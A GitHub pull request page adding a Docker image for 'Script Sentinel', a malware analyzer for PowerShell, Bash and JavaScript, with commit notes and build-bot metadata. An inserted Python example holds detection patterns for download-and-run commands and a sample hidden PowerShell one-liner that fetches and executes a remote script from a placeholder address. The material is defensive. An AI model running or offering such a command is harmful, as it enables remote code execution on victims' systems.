@AdiPeret
Contributor

Status

Ready/In Progress/In Hold (Reason for hold)

Related Content Pull Request

Related PR: link to the PR at demisto/content

Related Issues

Related: link to the issue

Description

A few sentences describing the overall goals of the pull request's commits.

- Analyzes PowerShell, Bash, and JavaScript scripts
- MITRE ATT&CK technique identification
- IOC extraction and XDR context
- Based on demisto/python3 Alpine image
- Non-root user for security
- Includes verification script
- Poetry-based dependency management
@welcome

welcome bot commented Nov 23, 2025

Thanks for opening your first pull request. You are awesome!

Questions about how we build Docker images? Make sure to check out our README.

What happens next?

  • The CI will run the build cycle on any new/modified docker images. If the build fails make sure to review the posted comment and address the errors.
  • Once the build passes, the CI will create a development docker image which can be used for local testing. A comment with the details will be posted to this PR.
  • A member of the team will then review the pull request.
  • If all is good and both the build is passing and the pull request has passed review, you will be able to merge the PR.
  • Once merged, the CI will run another build and create a production-ready docker image which will be deployed at Docker Hub under the demisto organization: https://hub.docker.com/u/demisto .

Good luck to us all!

- Remove test directories from tree-sitter-javascript and tree-sitter-powershell
- Remove node_modules directories (not needed at runtime)
- Update .gitignore to exclude test directories
- Add requirements.txt for explicit dependency management

This fixes the CI/CD pytest collection errors where test files were
being discovered in the grammar subdirectories.
- Remove requirements.txt (should be auto-generated by build system)
- Add requirements.txt to .gitignore
- Poetry will generate requirements.txt during build from poetry.lock

This follows the official Demisto dockerfiles build process where
requirements.txt is generated from poetry.lock during CI/CD build.
- Supports XSIAM wrapper mode via 'xsiam-wrapper' argument
- Supports CLI mode via 'analyze', '--help', or '-h' arguments
- Allows arbitrary commands for Demisto build verification (e.g., 'which python')
- Fixed line endings to LF (Unix) to prevent 'exec user process' errors
- Removed ENTRYPOINT to allow Demisto build verification to run commands directly
- Removed USER sentinel directive to avoid permission issues during verification
- The XSIAM integration will call xsiam_wrapper.py explicitly when needed
- Keeps all application code and dependencies intact
- Added tree-sitter-language-pack to pyproject.toml dependencies
- Removed poetry.lock to force regeneration with new dependency
- This package is required by sentinel/parser.py for script parsing
- Fixes ModuleNotFoundError during Docker image verification
- Updated tree-sitter from 0.21.3 to ^0.22.0 for compatibility with tree-sitter-language-pack
- Regenerated poetry.lock with compatible dependencies
- Resolves dependency conflict that prevented poetry lock generation
- Install gcc, musl-dev, python3-dev as virtual package
- Required for compiling tree-sitter-language-pack C extensions
- Clean up build deps after pip install to minimize image size
- Changed analyzer.py to use lazy import for ADK agent
- ADK is now only imported when include_llm=True
- Gracefully falls back to heuristics-only mode when ADK unavailable
- Fixes ModuleNotFoundError: No module named 'google.adk'
- Allows Docker image to work without optional LLM dependencies
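The lazy-import fallback described in the last commit message, as an added example that is not Script Sentinel's own code: the rule patterns, the Report shape, the `analyze`/`heuristic_scan` names and the sample script are assumptions constructed here, while the ATT&CK technique ids are real.

```python
import importlib
import re
from dataclasses import dataclass, field

# Heuristic rules: (script language or "*", pattern over the source, ATT&CK id).
# The ids are real MITRE ATT&CK technique ids; the patterns are constructed here.
RULES = [
    ("powershell", re.compile(r"-enc(odedcommand)?\b", re.I), "T1059.001"),
    ("powershell", re.compile(r"DownloadString|Invoke-WebRequest", re.I), "T1105"),
    ("bash", re.compile(r"\b(curl|wget)\b.*\|\s*(ba)?sh\b"), "T1105"),
    ("javascript", re.compile(r"\beval\s*\(|new\s+ActiveXObject", re.I), "T1059.007"),
    ("*", re.compile(r"FromBase64String|base64\s+-d|atob\(", re.I), "T1027"),
]
# Network IOCs: URLs are tried first so an IP inside a URL is not reported twice.
IOC_RE = re.compile(r"https?://[^\s'\"<>]+|\b(?:\d{1,3}\.){3}\d{1,3}\b")

@dataclass
class Report:
    language: str
    techniques: list = field(default_factory=list)
    iocs: list = field(default_factory=list)
    mode: str = "heuristics-only"

def heuristic_scan(script: str, language: str) -> Report:
    """Regex rules plus IOC extraction; needs no optional dependency."""
    rep = Report(language=language)
    for lang, pattern, technique in RULES:
        if lang in (language, "*") and pattern.search(script) and technique not in rep.techniques:
            rep.techniques.append(technique)
    rep.iocs = sorted(set(IOC_RE.findall(script)))
    return rep

def analyze(script: str, language: str, include_llm: bool = False,
            llm_module: str = "google.adk") -> Report:
    """Touch the LLM package only on demand; a missing package degrades to heuristics-only."""
    rep = heuristic_scan(script, language)
    if not include_llm:
        return rep                            # the optional package is never imported
    try:
        importlib.import_module(llm_module)   # ModuleNotFoundError is a subclass of ImportError
    except ImportError:
        return rep                            # graceful fallback: mode stays heuristics-only
    rep.mode = "heuristics+llm"               # enrichment via the agent would go here
    return rep

# Constructed sample, not a real capture: encoded command plus a remote download.
SAMPLE_PS = ("powershell -nop -w hidden -enc QQBBAEEA\n"
             "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/s.ps1')")
```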
@xsoar-bot

Docker Image Ready - Dev

Docker automatic build has deployed your docker image: devdemisto/script-sentinel:1.0.0.5974178
It is available now on docker hub at: https://hub.docker.com/r/devdemisto/script-sentinel/tags
Get started by pulling the image:

docker pull devdemisto/script-sentinel:1.0.0.5974178

Docker Metadata

  • Image Size: 93.93 MB
  • Image ID: sha256:6210ab1e603d4026c6af374fe23829f8417ef905106a79182ae9ec0e82ba97e9
  • Created: 2025-11-23T15:01:08.678680835Z
  • Arch: linux/amd64
  • Command: ["python3"]
  • Environment:
    • PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    • LANG=C.UTF-8
    • GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
    • PYTHON_VERSION=3.11.9
    • PYTHON_PIP_VERSION=24.0
    • PYTHON_SETUPTOOLS_VERSION=65.5.1
    • PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/66d8a0f637083e2c3ddffc0cb1e65ce126afb856/public/get-pip.py
    • PYTHON_GET_PIP_SHA256=6fb7b781206356f45ad79efbb19322caa6c2a5ad39092d0d44d0fec94117e118
    • DOCKER_IMAGE=devdemisto/script-sentinel:1.0.0.5974178
    • PYTHONPATH=/app:
  • Labels:
    • com.demisto.image.category:malware-analysis
    • com.demisto.image.type:python
    • description:Script Sentinel - Malware analysis for PowerShell, Bash, and JavaScript
    • maintainer:[email protected]
    • org.opencontainers.image.authors:Demisto <[email protected]>
    • org.opencontainers.image.revision:86ca2eb7dbaf003c6db5d9489342aea85f7436a0
    • org.opencontainers.image.version:1.0.0.5974178
    • version:1.0.0

- Changed python version constraint from ^3.11 to ~3.11
- Changed tree-sitter version constraint from ^0.22.0 to ~0.22.0
- Regenerated poetry.lock file with updated constraints
- Demisto build system requires tilde notation for version constraints
@xsoar-bot

Docker Image Ready - Dev

Docker automatic build has deployed your docker image: devdemisto/script-sentinel:1.0.0.5974625
It is available now on docker hub at: https://hub.docker.com/r/devdemisto/script-sentinel/tags
Get started by pulling the image:

docker pull devdemisto/script-sentinel:1.0.0.5974625

Docker Metadata

  • Image Size: 93.93 MB
  • Image ID: sha256:babf7f1cf6a22e94cf950a92038ea5d6f80836aa27189741fd3b9ec290b444b2
  • Created: 2025-11-23T15:21:32.58554888Z
  • Arch: linux/amd64
  • Command: ["python3"]
  • Environment:
    • PATH=/usr/local/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
    • LANG=C.UTF-8
    • GPG_KEY=A035C8C19219BA821ECEA86B64E628F8D684696D
    • PYTHON_VERSION=3.11.9
    • PYTHON_PIP_VERSION=24.0
    • PYTHON_SETUPTOOLS_VERSION=65.5.1
    • PYTHON_GET_PIP_URL=https://github.com/pypa/get-pip/raw/66d8a0f637083e2c3ddffc0cb1e65ce126afb856/public/get-pip.py
    • PYTHON_GET_PIP_SHA256=6fb7b781206356f45ad79efbb19322caa6c2a5ad39092d0d44d0fec94117e118
    • DOCKER_IMAGE=devdemisto/script-sentinel:1.0.0.5974625
    • PYTHONPATH=/app:
  • Labels:
    • com.demisto.image.category:malware-analysis
    • com.demisto.image.type:python
    • description:Script Sentinel - Malware analysis for PowerShell, Bash, and JavaScript
    • maintainer:[email protected]
    • org.opencontainers.image.authors:Demisto <[email protected]>
    • org.opencontainers.image.revision:afcc1e87ee720b04cd7b6fed37520265cb76021a
    • org.opencontainers.image.version:1.0.0.5974625
    • version:1.0.0
